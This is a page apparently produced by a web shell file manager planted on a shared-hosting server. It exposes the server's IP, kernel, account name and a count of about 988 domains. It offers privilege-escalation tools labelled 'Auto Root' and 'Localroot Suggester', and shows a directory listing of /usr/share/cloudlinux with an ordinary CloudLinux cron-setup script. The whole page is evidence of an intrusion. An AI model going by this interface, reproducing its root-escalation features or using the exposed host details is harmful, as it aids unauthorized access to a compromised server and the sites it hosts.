Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
cloudlinux /
Delete
Unzip
Name
Size
Permission
Date
Action
cl_plus
[ DIR ]
drwxr-xr-x
2026-09-04 11:36
hooks
[ DIR ]
drw-------
2026-09-04 11:42
lveutils_crons
[ DIR ]
drwxr-xr-x
2026-09-04 11:36
wpos
[ DIR ]
drwxr-xr-x
2026-09-04 11:37
xray
[ DIR ]
drwxr-xr-x
2026-09-04 11:37
.app_detector_cron_ver
2
B
-rw-r--r--
2026-09-04 11:34
.force_collecting_domains_is_done
0
B
-rw-r--r--
2026-09-08 18:39
accelerate-wp.version
23
B
-rw-r--r--
2026-07-31 10:23
add_clwpos_crons.sh
1.81
KB
-rwxr-xr-x
2026-07-31 10:23
alt-python27-cllib
24
B
-rw-r--r--
2026-08-05 07:40
cagefs
24
B
-rw-r--r--
2026-07-31 12:29
clean_packages.sh
396
B
-rwxr-xr-x
2026-07-29 13:24
clgetcpanelemail
288
B
-rwxr-xr-x
2026-07-29 13:24
cloudlinux_clean_hosting_packages.py
2.69
KB
-rwxr-xr-x
2026-07-29 13:24
clwpos_monitoring.service
679
B
-rw-r--r--
2026-07-31 10:23
clwposcron
513
B
-rwxr-xr-x
2026-07-31 10:23
license_out_of_date_email.txt
1.09
KB
-rw-r--r--
2026-07-29 13:24
lve-stats
12
B
-rw-r--r--
2026-06-23 08:44
lve-utils
24
B
-rw-r--r--
2026-07-29 13:45
lve_namespaces
894
B
-rwxr-xr-x
2026-07-29 13:24
lvectl
905
B
-rwxr-xr-x
2026-07-29 13:24
lvemanager
25
B
-rw-r--r--
2026-08-11 11:38
no_valid_license_screen.txt
1016
B
-rw-r--r--
2026-07-29 13:24
plesk-accelerate-wp-latest.zip
17.23
KB
-rw-r--r--
2026-07-31 10:23
plesk_sync_package_id
1.19
KB
-rwxr-xr-x
2026-07-29 13:24
remount_proc.py
581
B
-rwxr-xr-x
2026-07-29 13:24
reset_effective_cache.sh
439
B
-rwxr-xr-x
2026-07-29 13:24
Save
Rename
#!/usr/bin/bash # Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2021 All Rights Reserved # # Licensed under CLOUD LINUX LICENSE AGREEMENT # http://cloudlinux.com/docs/LICENSE.TXT [[ -z "$CLSHARE" ]] && exit 1 # Keep the flock lock file inside a root-only (0700) directory so an # unprivileged tenant cannot open it and hold an exclusive lock that would # make root's `flock -n` fail and silently skip clwposcron. /run is tmpfs and # cleared on reboot, so the cron entry (re)creates the directory itself before # every tick; only root can create entries under /run, so there is no squat. [[ -n "$WPOS_REQ_CRON_FILE" ]] && echo "*/10 * * * * root /usr/bin/mkdir -p -m 700 /run/cloudlinux-wpos && /usr/bin/flock -n /run/cloudlinux-wpos/generate.cronlock ${CLSHARE}/clwposcron &> /dev/null" > "${WPOS_REQ_CRON_FILE}" [[ -n "$CLWPOS_REDIS_EXTENSION_INSTALLER" ]] && echo "$(( RANDOM % 60 )) $(( RANDOM % 24 )) * * * root /usr/sbin/enable_redis_for_panel_php &> /dev/null" > "${CLWPOS_REDIS_EXTENSION_INSTALLER}" && echo "$(( RANDOM % 60 )) $(( RANDOM % 24 )) * * * root /usr/share/cloudlinux/wpos/enable_redis_for_alt_php.py &> /dev/null" >> "${CLWPOS_REDIS_EXTENSION_INSTALLER}" [[ -n "$CLWPOS_CLEANER_CRON" ]] && echo "*/15 * * * * root ${CLSHARE}/wpos/redis_configuration_pid_file_cleaner.py &> /dev/null" > "${CLWPOS_CLEANER_CRON}" [[ -n "$CLWPOS_COLLECT_INFORMATION_CRON" ]] && echo "0 0 * * * root /usr/sbin/clwpos_collect_information.py &> /dev/null" > "${CLWPOS_COLLECT_INFORMATION_CRON}" [[ -n "$CLWPOS_BILLING_CRON" ]] && echo "$(( RANDOM % 60 )) $(( RANDOM % 24 )) * * * root /usr/bin/cloudlinux-awp-admin cln-sync &> /dev/null" > "${CLWPOS_BILLING_CRON}" && echo "$(( RANDOM % 60 )) $(( RANDOM % 24 )) * * * root /usr/bin/cloudlinux-awp-admin billing-check &> /dev/null" >> "${CLWPOS_BILLING_CRON}"